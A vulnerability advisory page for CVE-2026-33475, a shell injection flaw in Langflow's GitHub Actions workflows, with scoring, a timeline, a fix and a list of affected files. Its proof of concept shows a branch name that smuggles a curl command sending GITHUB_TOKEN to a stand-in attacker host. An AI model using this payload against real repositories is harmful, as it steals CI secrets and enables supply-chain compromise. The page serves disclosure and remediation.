What is the CVSS score of CVE-2026-33475?

CVE-2026-33475 has a CVSS 3.1 base score of 9.1 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N. EPSS exploitation probability: 0.1%.

Which versions of Docker are affected by CVE-2026-33475?

Langflow versions prior to 1.9.0 contain a critical unauthenticated shell injection vulnerability in GitHub Actions workflows that allows attackers to execute arbitrary commands and steal CI/CD…. A patch is available.

Is there a public PoC exploit available for CVE-2026-33475?

Yes, a public proof-of-concept exploit is available for CVE-2026-33475. Prioritise patching immediately. EPSS: 0.1%.

Docker CVE-2026-33475

EUVD-2026-14790 CRITICAL

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)

2026-03-24 GitHub_M

RCE Docker Command Injection

9.1

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

None

Lifecycle Timeline

Analysis Updated

Apr 16, 2026 - 05:49 EUVD-patch-fix

executive_summary

Re-analysis Queued

Apr 16, 2026 - 05:29 backfill_euvd_patch

patch_released

Patch available

Apr 16, 2026 - 05:29 EUVD

1.9.0

PoC Detected

Mar 24, 2026 - 19:13 vuln.today

Public exploit code

EUVD ID Assigned

Mar 24, 2026 - 13:00 euvd

EUVD-2026-14790

Analysis Generated

Mar 24, 2026 - 13:00 vuln.today

CVE Published

Mar 24, 2026 - 12:54 nvd

CRITICAL 9.1

DescriptionNVD

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., ${{ github.head_ref }}) in run: steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., GITHUB_TOKEN), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.

---

Details

Several workflows in .github/workflows/ and .github/actions/ reference GitHub context variables directly in run: shell commands, such as:

yaml

run: |
  validate_branch_name "${{ github.event.pull_request.head.ref }}"

Or:

yaml

run: npx playwright install ${{ inputs.browsers }} --with-deps

Since github.head_ref, github.event.pull_request.title, and custom inputs.* may contain user-controlled values, they must be treated as untrusted input. Direct interpolation without proper quoting or sanitization leads to shell command injection.

---

PoC

Fork the Langflow repository
Create a new branch with the name:

bash

   injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN

Open a Pull Request to the main branch from the new branch
GitHub Actions will run the affected workflow (e.g., deploy-docs-draft.yml)
The run: step containing:

yaml

   echo "Branch: ${{ github.head_ref }}"

Will execute:

bash

   echo "Branch: injection-test"
   curl https://attacker.site/exfil?token=$GITHUB_TOKEN

The attacker receives the CI secret via the exfil URL.

---

Impact

Type: Shell Injection / Remote Code Execution in CI
Scope: Any public Langflow fork with GitHub Actions enabled
Impact: Full access to CI secrets (e.g., GITHUB_TOKEN), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data

---

Suggested Fix

Refactor affected workflows to use environment variables and wrap them in double quotes:

yaml

env:
  BRANCH_NAME: ${{ github.head_ref }}
run: |
  echo "Branch is: \"$BRANCH_NAME\""

Avoid direct ${{ ... }} interpolation inside run: for any user-controlled value.

---

Affected Files (Langflow `1.3.4`)

.github/actions/install-playwright/action.yml
.github/workflows/deploy-docs-draft.yml
.github/workflows/docker-build.yml
.github/workflows/release_nightly.yml
.github/workflows/python_test.yml
.github/workflows/typescript_test.yml

AnalysisAI

An unauthenticated shell injection vulnerability exists in Langflow's GitHub Actions CI/CD workflows, allowing attackers to execute arbitrary commands by crafting malicious branch names or pull request titles. Langflow versions prior to 1.9.0 are affected, specifically the langflow-ai:langflow product. …

RemediationAI

Within 24 hours: Identify all instances of langflow-ai:langflow versions prior to 1.9.0 in your CI/CD environments and development repositories; immediately revoke any GITHUB_TOKEN credentials that may have been exposed. Within 7 days: Upgrade all Langflow installations to version 1.9.0 or later and rotate all GitHub Actions secrets and access tokens. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

CVE-2026-33475 vulnerability details – vuln.today

Back

Docker CVE-2026-33475

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

Details

PoC

Impact

Suggested Fix

Affected Files (Langflow 1.3.4)

AnalysisAI

RemediationAI

Full analysis requires sign-in

Share

External POC / Exploit Code

Affected Files (Langflow `1.3.4`)